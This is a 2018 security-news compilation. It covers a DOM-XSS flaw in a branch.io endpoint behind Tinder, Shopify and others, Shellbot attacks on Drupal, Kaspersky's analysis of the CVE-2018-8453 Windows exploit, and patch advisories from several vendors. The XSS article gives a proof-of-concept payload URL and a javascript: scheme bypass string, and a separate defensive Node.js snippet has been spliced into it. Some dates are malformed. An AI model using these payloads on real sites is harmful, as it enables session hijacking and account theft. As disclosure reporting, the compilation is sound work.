- Vulnerebility -

Last update 09.10.2017 13:51:50




DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
13.1.0218 securityaffairs 
Vulnerebility

Our team of security researchers was researching dating apps client-side security, and one of the main focus targets was the social search mobile app Tinder.
After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.

We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.

Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.

While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.

Details:
A DOM-based XSS vulnerability, also known as "type-0 XSS", is a class of cross-site scripting vulnerability that appears within the DOM. In this type of attack the payload is executed as a result of modifying the DOM environment in the victim's browser, typically by client-side script in a dynamic page. In DOM-based XSS the HTML source code and the HTTP response of the attack are exactly the same as for a normal request, so the malicious payload cannot be found in the response; this makes it extremely difficult for browser built-in XSS mitigation features such as Chrome's XSS Auditor to detect it.

Can you spot the vulnerabilities?


The fact that branch.io wasn’t using CSP made these vulnerabilities easy to exploit in any browser we like.

1. DOM XSS
For example, our initial finding was that the endpoint https://go.tinder.com/amp-iframe-redirect was prone to multiple vulnerabilities (the scheme_redirect and redirect_strategy GET parameters control the div content).

redirect_strategy is “INJECTIONA” and scheme_redirect is “INJECTIONB” from the code above.

This meant that by modifying redirect_strategy to a dom-xss payload, it was possible to execute client-side code in the context of a Tinder domain in any browser:
https://go.tinder.com/amp-iframe-redirect?scheme_redirect=http://google.com&redirect_strategy=1)%7B%0Aalert(1)%3B//
will render in the DOM as:

    if (1){ alert(1);// && "INJECTIONA") {
        var parser = document.createElement('a');
        parser.href = "INJECTIONA";
        var protocol = parser.protocol.toLowerCase();


2. validateProtocol() and validate() Bypass
Also notice how validateProtocol() uses indexOf to check the schemes. The indexOf() method returns the position of the first occurrence of a specified value in a string, or -1 if the value never occurs. However, it can be tricked by using javascript://%0aalert(0)//good.com/https://: both validate functions can be bypassed because indexOf will find "https://".

    var parser = document.createElement('a');
    parser.href = url;
    var protocol = parser.protocol.toLowerCase();
    if (['javascript:', 'vbscript:', 'data:'].indexOf(protocol) < 0) {
        return url;
    }
    ....
    return null;

    if (['http:', 'https:'].indexOf(protocol) < 0) {
        window.top.location = validate("http://google.com");
    }
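As an added illustration of the two patterns described above (this is not code from the original post, from branch.io or from Tinder), the following Node.js snippet models a substring-based scheme check next to a parser-based allowlist, runs both against the bypass URL quoted above, and shows how a request parameter such as redirect_strategy can be handed to an inline script as data instead of being concatenated into code. The function names, the FALLBACK destination and the example.com placeholder are assumptions made for this example.

```javascript
// Added example; not code from the write-up or from the affected sites.
// Runs under Node.js, where the WHATWG URL class is a global.

// Model of a flawed check: it looks for an allowed scheme *anywhere* in the
// string, so a URL that merely contains "https://" later on is accepted.
function validateProtocolSubstring(url) {
  const allowed = ["http://", "https://"];
  return allowed.some((s) => url.toLowerCase().indexOf(s) >= 0) ? url : null;
}

// Hardened check: parse the URL first, then compare the *parsed* scheme
// against an exact allowlist. Unparseable input is rejected, not guessed at.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function validateProtocolParsed(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return null; // relative or malformed input: reject
  }
  return ALLOWED_SCHEMES.has(parsed.protocol.toLowerCase()) ? parsed.href : null;
}

// Redirect helper that never forwards to a rejected URL; it falls back to a
// fixed, known-good destination instead of an attacker-supplied one.
const FALLBACK = "https://example.com/"; // constructed placeholder

function safeRedirectTarget(candidate) {
  return validateProtocolParsed(candidate) ?? FALLBACK;
}

// Second pattern: a request parameter concatenated straight into an inline
// script. The safe alternative is to pass the value to the script as data,
// serialized as a JSON string literal with the characters that could close
// a <script> block or break a line escaped.
function embedAsJsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Builds the inline script with the parameter as a string literal only; the
// comparison logic lives in code, never in the template.
function buildInlineScript(redirectStrategy) {
  return "var redirectStrategy = " + embedAsJsLiteral(redirectStrategy) + ";";
}

// Bypass URL quoted in the write-up, the decoded redirect_strategy payload
// from the write-up, and a benign URL for comparison (constructed input).
const BYPASS = "javascript://%0aalert(0)//good.com/https://";
const STRATEGY_PAYLOAD = "1){\nalert(1);//";
const BENIGN = "https://good.com/path?x=1";

function demo() {
  return {
    substringOnBypass: validateProtocolSubstring(BYPASS), // the payload: bypassed
    parsedOnBypass: validateProtocolParsed(BYPASS),       // null: rejected
    parsedOnBenign: validateProtocolParsed(BENIGN),       // the benign URL
    redirectOnBypass: safeRedirectTarget(BYPASS),         // FALLBACK
    inlineScript: buildInlineScript(STRATEGY_PAYLOAD),    // no raw newline
  };
}

console.log(demo());
```

The parser-based check rejects the bypass URL because the parsed scheme is "javascript:", whatever the rest of the string contains; the literal-serialisation helper keeps the page's payload inside one quoted string, so it cannot close the `if (` expression the way the rendered DOM above shows.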

So, how did this bug affect more than Tinder?
go.tinder.com is an alias for custom.bnc.lt, a Branch.io resource. And many other companies have their alias pointing to it.

To name a few websites affected by this vulnerability: RobinHood, Shopify, Canva, Yelp, Western Union, Letgo, Cuvva, imgur, Lookout, fair.com and more.

Thanks to the fast response we got from Branch’s security team, this vulnerability has now been fixed for everyone’s domains.


Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
13.1.0218 securityaffairs 
Vulnerebility  Virus

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year, to install a backdoor on compromised servers.
Security experts from IBM reported that attackers are targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and take full control of the hosted platforms.

According to the IBM experts, this latest wave of attacks is conducted by financially motivated hackers who attempt to exploit the lack of patch management on many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The experts observed a large number of HTTP POST requests being sent from the same IP address as part of a widespread cyber-attack. The attackers used the requests to download a Perl script that launches the Shellbot backdoor, which uses an Internet Relay Chat (IRC) channel as its C&C.

Drupal attacks

The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.

Experts pointed out that the Shellbot code first appeared in 2005 and has been used by several threat groups; it was also used in the massive crypto-mining campaign that exploited the Apache Struts vulnerability CVE-2017-5638 in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Zero-day exploit (CVE-2018-8453) used in targeted attacks
13.1.0218 Kaspersky
Exploit  Vulnerebility

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

Behavioral detection engine and Automatic Exploit Prevention for endpoints
Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)
Kaspersky Lab Verdicts for the artifacts in this campaign are:

HEUR:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Technical details
CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

    kd> dt win32k!tagWND
       +0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

    /* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
    #define FNID_SCROLLBAR 0x029A
    #define FNID_BUTTON    0x02A1
    #define FNID_FREED     0x8000 /* Window being Freed... */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel Read/Write primitive, built on GDI Bitmap objects, that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory
More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Victims
The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

Attribution
During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

Conclusion
Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise:
Domains:
weekendstrips[.]net
shelves-design[.]com


Juniper Patches Serious Flaws in Junos OS
12.10.2018 securityweek
Vulnerebility

Juniper Networks this week informed customers that its Junos operating system is affected by many serious vulnerabilities, including a flaw that may have been triggered during malicious network probing.

Juniper on Wednesday published nearly two dozen advisories describing security holes in Junos, the operating system that powers its networking and security products. The company has provided patches and mitigations for each of the vulnerabilities.

One of the more interesting issues is CVE-2018-0049, which allows an attacker to crash the Junos kernel by sending specially crafted MPLS packets. Juniper noted that a single packet can cause a denial-of-service (DoS) condition, but an attacker can launch a sustained DoS attack by continually sending malicious packets.

Juniper says that while it's not aware of instances where this vulnerability was specifically targeted by hackers, the company is aware of "possible malicious network probing which may have triggered this issue."

Juniper has assigned a "critical" risk level to several vulnerabilities affecting the NTP daemon. The Network Time Foundation recently patched several vulnerabilities, including ones rated "critical" and "high severity," and Juniper has now rolled out the fixes to its customers with Junos OS updates.

Juniper NFX series devices are affected by a critical flaw that can allow a remote attacker to gain access to the system through accounts with blank passwords. The company addressed the issue by not allowing empty passwords.

The list of Junos vulnerabilities that are close to critical – with a CVSS score of 8.8 – includes two vulnerabilities that can be exploited to crash the routing protocol daemon (RPD) and possibly for remote code execution.

Juniper has also disclosed the existence of several other severe RPD-related vulnerabilities that can be exploited to cause a DoS condition.

An update for the Junos Space Network Management Platform fixes several vulnerabilities, including ones considered "high risk."

Another serious DoS vulnerability has been found in the SIP application layer gateway (ALG) in Junos, which allows an attacker to crash various processes.

A "high risk" rating has also been assigned to a vulnerability in the RSH service that allows a remote and unauthenticated attacker to gain root access to affected devices.

A dozen of the advisories published this week by Juniper describe "medium risk" flaws that can be exploited for DoS and cross-site scripting (XSS) attacks.


Audit Finds No Critical Flaws in Firefox Update System
12.10.2018 securityweek
Vulnerebility

An audit commissioned by Mozilla for the Firefox update system revealed no critical vulnerabilities and the flaws rated "high severity" were not easy to exploit.

Experts at Germany-based X41 spent 27 days analyzing the Firefox Application Update Service (AUS), including its update signing protocol, client code, backend and other components. The audit involved a cryptographic review, fuzzing, pentesting, and manual code analysis.

X41's audit revealed 14 vulnerabilities, including three issues that based on their CVSS score would be rated as "high severity," seven "medium" and four "low" flaws. In addition, experts discovered 21 issues that have been described by Mozilla as "side findings," which are informational.

The most serious of the security holes are related to the use of JavaScript libraries with known vulnerabilities, the lack of validation for cross-site request forgery (CSRF) tokens, and the use of cookies without the "secure" flag. All of these problems affected the backend service that manages updates, which Mozilla has dubbed Balrog.

While these flaws may have normally posed a serious risk, Mozilla pointed out that the actual risk was lowered due to AUS being protected by multiple layers of authentication inside its internal network.

The audit also uncovered some bugs in the code that handles update files, but the cryptographic signatures implemented by Mozilla prevent threat actors from creating malicious update files.

Researchers also discovered some less serious denial-of-service (DoS) bugs, memory corruption issues, and insecure handling of data, but they noted that exploitation was prevented by the need to bypass crypto signatures.

"No issues were identified in the handling of cryptographic signatures for update files," X41 wrote in its report. "There were no cryptographic signatures on the XML files describing the update files’ location and other metadata. The files were downloaded via HTTPS, but the server certificates or public keys were not pinned."

Auditors noted that the number of informational bugs was "unusually high" and warned that these should be patched as well, as some of them could turn out to be exploitable and critical.

"In conclusion, the AUS showed good resistance against the actual exploitation of vulnerabilities," X41 said.

Mozilla has already patched the serious vulnerabilities and is currently working on addressing the less severe issues and the side findings. The organization has made public the full report from X41 and opened the bug tracker where the patching progress can be monitored.

This is not the first security audit commissioned by Mozilla. Last year it hired Cure53 to analyze the Firefox Accounts system.


Juniper Networks provides dozens of fixes for vulnerabilities in Junos OS

12.10.2018 securityaffairs Vulnerebility

Juniper Networks has released security updates to address serious vulnerabilities affecting the Junos operating system.
This week, Juniper Networks patched dozens of serious security flaws in Junos OS, providing security patches for each of them; the security advisories are available on the company website.

The most severe flaw is probably the CVE-2018-0049, which could be exploited by an attacker to crash the Junos kernel by sending specially crafted MPLS packets.

Juniper reported that a single specially crafted MPLS packet can trigger a DoS condition, and that by continuing to send such packets an attacker can keep the device crashed.

“A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS allows an attacker to cause the Junos OS kernel to crash. A single packet received by the target victim will cause a Denial of Service condition. Continued receipt of this specifically crafted malicious MPLS packet will cause a sustained Denial of Service condition.” reads the security advisory.

As a possible workaround, the company suggests removing the MPLS configuration stanza from interfaces at risk.

At the time the patch was provided, there was no news of exploitation of the flaw in the wild; however, Juniper is aware of "possible malicious network probing which may have triggered this issue."

Another severe flaw fixed by Juniper, affecting NFX series devices, could be exploited by a remote attacker to gain access to the system through accounts with blank passwords.

The patch provided by the company no longer allows empty passwords.

Juniper also provided fixes for several vulnerabilities affecting the NTP daemon. The company also addressed several flaws in the routing protocol daemon (RPD), most of which could be exploited to cause a DoS condition.


Two issues can be exploited to crash the routing protocol daemon (RPD) and potentially allow remote code execution.

Looking at the list of advisories, we can also find a fix for a high-risk vulnerability in the Junos Space Network Management Platform and a DoS flaw in the SIP application layer gateway (ALG) in Junos. This latter issue could be exploited by an attacker to crash several processes.

The company also fixed a high-risk flaw in the RSH service that could allow a remote and unauthenticated attacker to gain root access to affected devices.

The company also fixed a dozen DoS and XSS flaws rated as "medium risk."


SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
11.10.2018 securityaffairs
Vulnerebility

SAP released its October 2018 set of patches, it includes the first Hot News security note for SAP BusinessObjects in over five years.
SAP released its October 2018 set of patches, which included 11 security notes; the company also released 4 updates to previously released notes.

The patches therefore include 15 notes, 2 of which are rated Hot News; one of these is the first Hot News note for SAP BusinessObjects in over five years.

“SAP BusinessObjects BI Suite has an Information Disclosure vulnerability (CVSS Base Score: 9.8 CVE-2018-2471). An attacker can use it to reveal additional information (system data, debugging information, etc.) that will help to learn about a system and plan other attacks.” reads a blog post published by ERPScan.

The remaining notes include 4 High priority and 9 Medium priority ones; in October, Information Disclosure is the largest group in terms of the number of vulnerabilities.


The most important note (CVSS score of 9.8) addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client tracked as CVE-2018-2471.

“Under certain conditions SAP BusinessObjects Business Intelligence Platform 4.10 and 4.20 allows an attacker to access information which would otherwise be restricted.” reads the security advisory.

The second Hot News note in the October 2018 set of patches is an update to a Security Note released in April 2018; it provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws addressed by SAP in October are:

2699726 [CVE-2018-2475] Missing network isolation in Gardener
Product: project "Gardener"; Versions: 0.12.2; Priority: High (CVSS 8.5)

2674215 Denial of service (DoS) in OPC UA applications of SAP Plant Connectivity
Related CVEs: CVE-2018-12585, CVE-2018-12086
Product: SAP Plant Connectivity; Versions: 15.0, 15.1, 15.2; Priority: High (CVSS 8.2)

2392860 Update to Security Note released on February 2017 Patch Day: Leveraging privileges by customer transaction code
Product: SAP Records Management; Versions: 7.0 to 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51; Priority: High (CVSS 8.0)

2681207 Update to Security Note released on September 2018 Patch Day: [CVE-2018-2465] Missing XML Validation vulnerability in SAP HANA, Extended Application Services classic model
Product: SAP HANA; Versions: 1.0, 2.0; Priority: High (CVSS 7.5)

Experts from security firm ERPScan noticed that chaining the missing network isolation in Gardener with other issues can theoretically lead to the compromise of clusters in the application context.

The other SAP security notes address vulnerabilities in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

This patch update also addresses 5 Support Package Notes.


Windows Zero-Day Exploited in Attacks Aimed at Middle East
11.10.2018 securityweek
Vulnerebility

One of the vulnerabilities patched by Microsoft with its latest Patch Tuesday updates is a Windows zero-day exploited by an advanced persistent threat (APT) group in attacks aimed at entities in the Middle East.

The flaw, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. An authenticated attacker can exploit the vulnerability to take control of an affected system.

The vulnerability was reported to Microsoft by Kaspersky Lab after one of the security firm's systems detected an exploitation attempt. Kaspersky said it had reported the vulnerability to Microsoft on August 17 – it's unclear why Microsoft waited so long to release a fix.

According to Kaspersky, CVE-2018-8453 has been exploited by an APT group it tracks as FruityArmor. The exploit was executed by a malware installer for obtaining the privileges needed to gain persistence on the targeted system.

The security firm said FruityArmor created a high quality and reliable exploit that would work on as many versions of Windows as possible, including Windows 10.

Kaspersky has described the vulnerability as a use-after-free bug that is similar to CVE-2017-0263, a flaw patched by Microsoft back in May 2017 after it had been exploited by the Russia-linked threat actor known as APT28, Sofacy and Fancy Bear.

Hackers packaged the CVE-2018-8453 exploit in a malware installer that requires system privileges to deploy its payload. The payload has been described as a "sophisticated implant used by the attackers for persistent access to the victims' machines."

Kaspersky has seen the exploit being used against less than a dozen targets located in the Middle East.

"So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved," Kaspersky researchers explained.

The company determined that FruityArmor is likely behind these attacks after discovering a PowerShell backdoor that in the past was only used by this APT group. In addition, some of the command and control (C&C) domains used in the latest campaign were also involved in past FruityArmor operations.

A blog post published early on Wednesday by Kaspersky contains technical details on the vulnerability and how it has been exploited by FruityArmor.

This is not the first time Kaspersky has come across a zero-day vulnerability exploited by FruityArmor. The hackers also exploited a Windows zero-day back in 2016, which Microsoft patched in October 2016 after being alerted by Kaspersky. At the time, the victims were researchers, activists and government-related individuals in Thailand, Iran, Algeria, Yemen, Saudi Arabia and Sweden.

"We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar," Kaspersky said.


Many Siemens Products Affected by Foreshadow Vulnerabilities
11.10.2018 securityweek
Vulnerebility

Siemens informed customers this week that many of its products are affected by the recently disclosed processor vulnerabilities known as Foreshadow and L1 Terminal Fault (L1TF).

There are a total of three Foreshadow vulnerabilities affecting Intel Core and Xeon CPUs: CVE-2018-3615, which impacts Intel's Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

Foreshadow/L1TF vulnerabilities affect Siemens products

The security holes could allow malicious applications to obtain potentially sensitive information from a device's memory, including data associated with operating systems, apps and virtual machines.

Siemens noted that several of its industrial products use the impacted Intel processors, including RUGGEDCOM, SIMATIC, SIMOTION and SINUMERIK devices. The Siemens advisory lists more than 30 affected products.

The company has released BIOS updates, workarounds and mitigations to help users prevent potential attacks exploiting the Foreshadow vulnerabilities. The German industrial giant has also advised customers to install available operating system updates.

BIOS updates are currently available for SIMATIC IPC, SIMATIC Field PG, SIMATIC ITP, SIMOTION P and SINUMERIK PCU devices, and the company is working on releasing firmware patches for other products as well.

Since Foreshadow requires the attacker to execute a malicious application on the targeted system, Siemens recommends "limiting the possibilities to run untrusted code if possible," including by applying defense-in-depth methods.

Several organizations have released advisories for the Foreshadow vulnerabilities, including Cisco, F5 Networks, HPE, Synology, Huawei, Lenovo, SonicWall, NetApp, and CERT/CC. While NIST and some of the vendors have classified the flaws as "medium severity," Siemens, Huawei, Lenovo, SonicWall, NetApp, and HPE have assigned CVSS scores that put them in the "high severity" category.


SAP Patches Critical Vulnerability in BusinessObjects
11.10.2018 securityweek
Vulnerebility

This week, SAP released its October 2018 set of patches, which includes the first Hot News security note for SAP BusinessObjects in over five years.

SAP included 11 security notes in its October 2018 Security Patch Day, to which it also added 4 updates to previously released notes. Thus, the patches include 15 notes: 2 rated Hot News, 4 High priority, and 9 Medium priority.

Featuring a CVSS score of 9.8, the most important of the notes addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client (CVE-2018-2471).

An analytics business intelligence front-end platform, BusinessObjects provides customers with the ability to search and analyze data, and with the option to visualize it and perform predictive analytics.

The information disclosure bug can be triggered through the execution of certain special Central Management Server (CMS) scripts on the Central Management Server. The execution is performed without properly checked authorizations, as ERP and business-critical application security company Onapsis explains.

Additionally, SAP tagged as Hot News an update to a note released in April 2018, which provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws include missing network isolation in Gardener (CVE-2018-2475), denial of service (DOS) in OPC UA applications of SAP Plant Connectivity (CVE-2018-12585, CVE-2018-12086), and updates to previously released notes, affecting SAP Records Management and SAP HANA.

The missing network isolation flaw in Gardener can be combined with other security issues to theoretically lead to the compromise of clusters in the application context, ERPScan, a company that specializes in securing Oracle and SAP products, reveals.

The remaining SAP security notes address bugs in NetWeaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

Five support package notes are added to the 15 Security Patch Day notes, for a total of 20 security notes. Six of the notes are updates to previously released security notes.

Information disclosure was the most encountered type of vulnerability, followed by cross-site scripting (XSS), XML external entity (XXE), and cross-site request forgery (CSRF).


CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs
APT  Vulnerebility

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, is related to how the Win32k component of Windows handles objects in memory.

The flaw, discovered by experts from Kaspersky Lab, could be exploited by an authenticated attacker to take control of an affected system.


Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor's activity has been slowly increasing over the last two years.

The zero-day exploit was included in the malware installer used by the group to escalate privileges on the target machine and gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability, tracked as CVE-2017-0263, that was fixed by Microsoft in May 2017 and had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.


Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group
10.10.2018 securityweek
Vulnerebility

Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.

The zero-day, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. The company says an authenticated attacker can exploit the security hole to elevate privileges and take control of the affected system.

According to Microsoft, the vulnerability has been actively exploited against older versions of Windows, but exploitation may also be possible on the latest versions of the operating system.

The flaw was reported to Microsoft by Kaspersky Lab, whose experts noticed the attacks exploiting CVE-2018-8453. Kaspersky will publish a detailed technical report on Wednesday, but the company told SecurityWeek that the vulnerability has been exploited by the FruityArmor group in a highly targeted campaign.

Interestingly, Microsoft's Patch Tuesday updates for October 2016 also addressed a Windows zero-day exploited by FruityArmor. That attack was also first observed by Kaspersky Lab.

Microsoft's latest updates also fix three vulnerabilities that were publicly disclosed before patches were made available, including a JET Database Engine issue for which an unofficial patch was released by 0patch.

The other disclosed flaws are a privilege escalation bug affecting the Windows kernel, and a remote code execution weakness impacting Azure IoT.

A dozen of the vulnerabilities addressed this month are critical. They impact Internet Explorer, Edge, Hyper-V, and XML Core Services.

One of the patches addresses CVE-2010-2190. This vulnerability was first resolved in 2010, but Exchange Server was not identified as one of the affected products at the time.

"This vulnerability affects all installations of Exchange Server. If you are running any version of Exchange server released prior to Exchange Server 2016 Cumulative Update 11 (as of this publishing, Cumulative Update 10 is the most recent cumulative update for Exchange 2016), the Visual Studio 2010 updates in MS11-025 should be applied to your Exchange Server," Microsoft explained in its advisory.

The remaining vulnerabilities have been classified as "important" – and a couple as "moderate" and "low" – and they impact Windows, SharePoint, Office, Edge, and SQL Server Management Studio.

